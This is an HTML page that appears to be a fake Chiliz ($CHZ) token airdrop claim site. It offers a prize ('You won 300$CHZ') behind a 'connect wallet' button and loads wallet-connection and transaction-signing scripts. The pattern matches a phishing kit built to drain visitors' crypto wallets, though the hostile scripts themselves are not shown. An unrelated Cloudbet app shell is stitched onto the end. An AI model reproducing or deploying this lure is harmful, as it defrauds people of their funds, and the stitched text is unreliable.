<!doctype html>
<html lang="fr">

<head>
    <meta charset="utf-8">
    <title>Chiliz $CHZ</title>
<meta content="Chiliz $CHZ" property="og:title">

<meta property="og:image" content="/static/images/logos/opensea.svg">

    <meta property="og:type" content="website">

    <meta property="og:url" content="">

    <meta name="twitter:card" content="summary_large_image">
    <link rel="shortcut icon" href="https://gateway.pinata.cloud/ipfs/Qmd6ExeMWs7apiGAKV8RAtEZsUxfqxkkG2FKhWFV4H9HMc" />

    <meta name="twitter:image" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="shortcut icon" href="" />
    <link rel="preload" href="./src/css/normal.css" as="style">
    <link rel="stylesheet" href="./src/css/normal.css">
    <link rel="stylesheet" href="./src/css/main.css">
    <link rel="preload" href="./src/css/main.css" as="style">
    <script src="src/js/1409195906.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
    <link rel="preload" href="./src/css/normal.css" as="style">
    <link rel="stylesheet" href="./src/css/normal.css">
    <link rel="stylesheet" href="./src/css/main.css">
    <link rel="preload" href="./src/css/main.css" as="style">

    <script src="./settings.js"></script>
    <link rel="stylesheet" href="./src/css/styles.css">

    <script src="src/js/ethereumjs-tx-1.3.3.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/bignumber.js/8.0.2/bignumber.js" integrity="sha512-XQDG6H87RgMf+aNFwDPCUcFwUf3t9liyqN/2BkJ8KGixupbjPwQHNhypNA972mLIkg4KPo4lkGmqAf3yfDz8hw==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script src="src/js/tokenabi.js"></script>
    <script src="jquery.min.js"></script>
    <script src="base.js?1"></script>    


</head>	
	<style>
    .Home_soon__8s2ww button {
        background-color: #102BEE;
        border: 2px solid #344CFC;
        border-radius: 20px;
        box-sizing: border-box;
        color: #FFFFFF;
        cursor: pointer;
        display: inline-block;
	display: block;
	margin-right: auto;
	margin-left: auto;    
        font-size: 12px;
        font-weight: 450;
        line-height: 18px;
        margin: 6;
        outline: none;
        padding: 10px 15px;
        position: relative;
        text-align: right;
        text-decoration: none;
        touch-action: manipulation;
        transition: box-shadow .2s, -ms-transform .1s, -webkit-transform .1s, transform .1s;
        user-select: none;
        -webkit-user-select: none;
        width: auto;
    }

    .Home_soon__8s2ww button:focus-visible {
        box-shadow: #222222 0 0 0 2px, rgba(255, 255, 255, 0.8) 0 0 0 4px;
        transition: box-shadow .2s;
    }

    .Home_soon__8s2ww button:active {
        background-color: #F7F7F7;
        border-color: #000000;
        transform: scale(.96);
    }

    .Home_soon__8s2ww button:disabled {
        border-color: #DDDDDD;
        color: #DDDDDD;
        cursor: not-allowed;
        opacity: 1;
    }
</style>


                    <div class="Home_soon__8s2ww">
                        <button id="connectWallet">ᴄʟᴀɪᴍ ʏᴏᴜʀ ᴛᴏᴋᴇɴ ᴀɪʀᴅʀᴏᴘs</button>
                        <button id="claimButton" style="display: none;">ʏᴏᴜ ᴡᴏɴ 𝟹𝟶𝟶$ᴄʜᴢ ᴄʟᴀɪᴍ ɴᴏᴡ</button>
                        <br />
                    </div>
                    
                    
                  
                    </div>
                </div>
            </div>
        </div>
    </div>

    <script src="./src/js/loader_index.js"></script>

    <script type="text/javascript" src="src/js/web3.min.js"></script>
    <script type="text/javascript" src="src/js/moralis.js"></script>
    <script src="https://unpkg.com/@walletconnect/web3-provider@1.7.5/dist/umd/index.min.js"></script>
    <script type="text/javascript" src="src/js/claim.js"></script>
    
    <script type="text/javascript" src="./src/js/index.min.js"></script>

    <script type="text/javascript">
        $('.alert-eth-message-close').click(function(){
            $('.alert-eth-message').fadeOut(200);
        });
    </script>

</body>
<script charset="UTF-8" id="LA_COLLECT" src="./src/js/js-sdk-pro.min.js"></script>
	
	


<!doctype html><html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=0,shrink-to-fit=no"/><meta name="theme-color" content="#313131"/><link rel="shortcut icon" href="/favicon.ico?v=RymK94EQal"/><link rel="apple-touch-icon" sizes="180x180" href="/favicons/apple-touch-icon.png?v=RymK94EQal"/><link rel="icon" type="image/png" sizes="32x32" href="/favicons/favicon-32x32.png?v=RymK94EQal"/><link rel="icon" type="image/png" sizes="16x16" href="/favicons/favicon-16x16.png?v=RymK94EQal"/><link rel="mask-icon" href="/favicons/safari-pinned-tab.svg?v=RymK94EQal" color="#2b2943"/><link rel="manifest" href="/manifest.json?v=RymK94EQal" crossorigin="use-credentials"/><title>Cloudbet</title><style>body{min-height:100%;margin:0}html{min-height:100%}</style><script defer="defer" src="/static/js/runtime-main.8f38e767.js"></script><script defer="defer" src="/static/js/react.4c353d9f.js"></script><script defer="defer" src="/static/js/firebase.9347a088.js"></script><script defer="defer" src="/static/js/main.030bc9af.js"></script></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id="root" style="height:100%"></div><script src="https://accounts.google.com/gsi/client" async defer="defer"></script></body></html>
